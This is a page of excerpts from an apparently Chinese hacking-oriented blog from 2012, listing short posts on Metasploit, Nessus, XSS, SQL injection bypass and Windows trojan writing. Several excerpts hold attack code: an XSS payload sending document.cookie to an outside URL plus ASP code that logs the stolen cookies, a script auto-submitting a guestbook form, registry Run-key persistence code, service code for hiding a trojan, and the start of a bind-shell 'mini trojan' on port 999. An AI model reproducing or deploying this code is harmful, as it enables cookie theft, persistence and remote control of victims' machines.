上一页 1 ··· 8 9 10 11 12 13 14 下一页
摘要: 为了做实验方便,windows中经常要添加一个永远活动的loopback接口,下面是添加loopback接口的方法:开始》控制面板》添加硬件,双击,打开如下图1:图1:图1点击下一步,硬件搜索完毕后,出现图2:图2:点击下一步,选择“是”,点下一步,如图三:图3:选择“添加新的硬件设备”,点击下一步,如图四:图4:选择“安装我手动从列表选择的硬件”,点击下一步:如图五:图5:选择“网络适配器”,然后点击下一步,如图6:图6:在左边的厂商列表里边选择“Microsoft”,网卡选择“Microsoft Loopback Adapter”,点击下一步最后完成安装。最后,在你的网络连接里边就会出现一 阅读全文
posted @ 2012-11-30 19:48 山貓 阅读(358) 评论(0) 推荐(0) 编辑
摘要: 在Metasploit中编写自己到扫描器是不是很帅到一件事呢?学习一下这段代码:#Metasploitrequire 'msf/core'class Metasploit3 < Msf::Auxiliary include Msf::Exploit::Remote::Tcp include Msf::Auxiliary::Scanner def initialize super( 'Name' =>'My custom TCP scan', 'Version' =>'$Revision:1$', 阅读全文
posted @ 2012-11-30 09:14 山貓 阅读(305) 评论(0) 推荐(0) 编辑
摘要: 一、BT5下安装和注册Nessus1、下载nessus。下载网址:http://www.nessus.org/products/nessus/nessus-download-agreement,在该网址中选择Agress后就会进入到下载界面。在下载界面中根据操作系统的不同下载合适的版本,本人下载的是:Ubuntu 9.10 / Ubuntu 10.04 (32 bits)这个版本。2、安装下载的.deb文件。使用dpkg命令。3、创建用户。在终端通过cd命令进入目录 opt/nessus/sbin/ ,再输入命令:nessus-adduser创建一个用户,一路yes。4、去官网进行注册,获取序 阅读全文
posted @ 2012-11-29 16:54 山貓 阅读(776) 评论(0) 推荐(1) 编辑
摘要: 转自:http://www.myhack58.com/Article/html/3/7/2008/18771.htmXSS跨站脚本攻击属于被动式攻击,对于急于求成的朋友来说,往往不会被重视,而喜欢挂马的朋友则喜爱有加。通过构造特殊的页面,再把调用该页面的代码嵌在被攻击者网站的某一网页中,而当有人浏览该页面时,在后台即已执行了内嵌的代码。对于被调用页面的构造,根据不同的需求功能也不一样。最常见的是挂马,比如利用IE漏洞悄悄在浏览者的计算机上种植木马;而另一种方式则可以利用互动式页面的各种语言(如ASP,PHP,JSP等)来构造一个完全达到自己需求的页面,而不是简单地做一种达到目的的“介质”。 . 阅读全文
posted @ 2012-11-27 13:34 山貓 阅读(793) 评论(0) 推荐(0) 编辑
摘要: 转自:http://blog.csdn.net/cnbird2008/article/details/4299544http://ha.ckers.org/xss.html关于XSS Proxy技术关于Cross Iframe Trick的思路。让我想到了曾经看到的关于XSS Proxy的一些文章。Advanced Cross-Site-Scripting with Real-time Remote Attacker Control ,精彩之处:还有一篇关于Advanced XSS attacks and XSS-Proxy 的PPT。都是05年的资料了。它的主要思想是:在有XSS漏洞(持久型 阅读全文
posted @ 2012-11-26 22:13 山貓 阅读(339) 评论(0) 推荐(0) 编辑
摘要: 参考:http://zhchx0827.iteye.com/blog/1681349下面是我测试的代码,贴出来记录一下:<script>document.write('<form name=myForm></form>'); var myForm=document.forms['myForm']; myForm.action='http://192.168.0.100/emlog/?action=guestbook'; myForm.method='POST'; var input = docu 阅读全文
posted @ 2012-11-26 10:25 山貓 阅读(800) 评论(0) 推荐(0) 编辑
摘要: <script>document.write('<img src="http://url/news.asp?msg='+document.cookie+'" width=0 height=0 border=0 />');</script>news.asp代码:<%msg=Request.ServerVariables("QUERY_STRING") testfile=Server.MapPath("cook.txt") set fs=server.CreateO 阅读全文
posted @ 2012-11-25 16:08 山貓 阅读(360) 评论(0) 推荐(0) 编辑
摘要: 转自:http://www.2cto.com/Article/200906/39180.html暗组 zachary大学快毕业了,想起高考时想填的一个学校,由于高考考的比较差,只超过二本十多分,只能往二本中靠低的学校填。首先踩点,打开google输入:site:XXXXXX inurl:asp?id= 搜出很多链接,随便打开了一个,在后面加上单引号,提示如图一所示明显做了防注入过滤。按照我一般的思路是:首先是检查是否有注入点,不行就检查cookie注入,再不行就找别的突破点。清空地址栏,输入:javascript:alert(document.cookie=”id=”+escape(“1556 阅读全文
posted @ 2012-11-25 13:49 山貓 阅读(494) 评论(0) 推荐(0) 编辑
摘要: 转自:http://hi.baidu.com/orz_men/item/e69491ffc86107ec1b111f86'SQL通用防注入程序'Aseanleung'--------定义部份------------------Dim Fy_Post,Fy_Get,Fy_In,Fy_Inf,Fy_Xh,Fy_db,Fy_dbstrDim fso1,all_tree2,file1,files,filez,fs1,zruseripIf Request.QueryString<>"" Then (对Request.QueryString提交(客户 阅读全文
posted @ 2012-11-25 12:45 山貓 阅读(679) 评论(0) 推荐(0) 编辑
摘要: 有些时候我们在渗透测试的时候需要提交一些假的http头信息或者一些post参数,这时候我们可以用nc来提交,命令是nc -v www.test.com<abc.txt其中www.test.com就是目标网站,abc.txt中就是需要提交的数据,比如我想往一个网页提交一个post参数的值。页面代码是:<?php$auth='0';extract($_POST);if($auth == 1){echo "private!";}else{echo "public";}?>这段代码是我用来测试extract函数的变量覆盖漏洞的, 阅读全文
posted @ 2012-11-23 00:22 山貓 阅读(1103) 评论(0) 推荐(0) 编辑
摘要: ini_get是获取php.ini里的环境变量的值.语法string ini_get ( string varname )返回值如果为布尔型则为0或1例:ini_get(register_globals) 阅读全文
posted @ 2012-11-22 17:04 山貓 阅读(195) 评论(0) 推荐(0) 编辑
摘要: unset()是注销定义的变量.因为PHP变量是不需要预先定义就可以使用.如果不unset($color),后面的代码如果用到同名的$color,PHP就会使用前面使用过的这个(里面是有值的),如果不重新赋值就使用,可能会影响到正确性. 阅读全文
posted @ 2012-11-22 16:44 山貓 阅读(184) 评论(0) 推荐(0) 编辑
摘要: 转自:http://blog.csdn.net/miyunhong/article/details/45831822005 msdn url:ms-help://MS.MSDNQTR.v80.chs/MS.MSDN.v80/MS.WINCE.v50.en/wcecoreos5/html/wce50lrfsystemerrorsnumericalorder.htmThe following table shows possible system error values.CodeDescriptionName0The operation completed successfully.ERROR_ 阅读全文
posted @ 2012-11-21 16:36 山貓 阅读(1098) 评论(0) 推荐(0) 编辑
摘要: pptv太流氓了!亲自试验,肯定行!然后我吧pptv卸载了,发誓永远不用了1.先把C:\Windows\System32里找到kindling.dll删除2.win+R输入regedit,删除途中文件夹4c5a........或用其他工具把右键4c5a....的项删掉 阅读全文
posted @ 2012-11-21 10:31 山貓 阅读(296) 评论(0) 推荐(0) 编辑
摘要: 客户端程序代码如下:#pragma comment(lib,"ws2_32.lib")#include<winsock2.h>#include<stdio.h>BOOL InitWinsock();void main(){ SOCKET socket1; InitWinsock(); struct sockaddr_in server; int len=sizeof(server); server.sin_family=AF_INET; server.sin_port=htons(1000); //Server的监听端口为1000 server.si 阅读全文
posted @ 2012-11-20 18:51 山貓 阅读(318) 评论(0) 推荐(0) 编辑
摘要: 这是个基于TCP Socket的例子,流程是WSAStartup()->socket()->bind()-accept()->send()#pragma comment(lib,"ws2_32.lib")#include<winsock2.h>#include<stdio.h>int main(){ SOCKET mysock,tsock; //定义套接字 struct sockaddr_in my_addr; //本地地址信息 struct sockaddr_in their_addr; //连接者地址信息 int sin_siz 阅读全文
posted @ 2012-11-20 16:48 山貓 阅读(235) 评论(0) 推荐(0) 编辑
摘要: 以下代码是VC6的代码对系统服务的创建和删除之类的操作,用于木马隐藏技术。#include<stdio.h>#include<winsock2.h>#pragma comment(lib,"ws2_32.lib")void WINAPI ServiceMain(DWORD,LPTSTR *);void WINAPI ServiceCtrlHandler(DWORD Opcode); //服务控制函数BOOL InstallCmdService();void DelServices();void door();SERVICE_STATUS m_Serv 阅读全文
posted @ 2012-11-20 13:07 山貓 阅读(309) 评论(1) 推荐(0) 编辑
摘要: 下面这段代码是vc++对注册表的一系列操作,还有文件自身的复制功能#include <stdio.h>#include <windows.h>int main(void){ char regname[]="Software\\Microsoft\\Windows\\CurrentVersion\\Run"; HKEY hkResult; int ret; //打开关键字 ret=RegOpenKey(HKEY_LOCAL_MACHINE,regname,&hkResult); ret=RegSetValueEx(hkResult," 阅读全文
posted @ 2012-11-19 22:20 山貓 阅读(362) 评论(0) 推荐(0) 编辑
摘要: 转自:http://hi.baidu.com/raoxj/item/a50fe81af2ba11f965eabf5c才在网上下了一个Microsoft Visual C++6.0,安装以后,当点击打开按钮时出现错误提示: 点击确定后又出现: 然后就自动退出了。解决方法如下:在官网上下载Vs6sp6.exe,然后安装即可。http://www.microsoft.com/downloads/details.aspx?familyid=a8494edb-2e89-4676-a16a-5c5477cb9713&displaylang=zh-cn 下载完成后,只需将其先解压到随便一个文件夹中, 阅读全文
posted @ 2012-11-19 22:11 山貓 阅读(577) 评论(0) 推荐(0) 编辑
摘要: 这是个mini木马,要正向连接,通过telnet或nc连接就好。#pragma comment(lib,"ws2_32.lib")#include <winsock2.h>#include <windows.h>#define MasterPort 999 //定义监听端口999main(){ WSADATA WSADa; sockaddr_in SockAddrIn; SOCKET CSocket,SSocket; int iAddrSize; PROCESS_INFORMATION ProcessInfo; STARTUPINFO Startup 阅读全文
posted @ 2012-11-19 20:56 山貓 阅读(938) 评论(1) 推荐(0) 编辑
上一页 1 ··· 8 9 10 11 12 13 14 下一页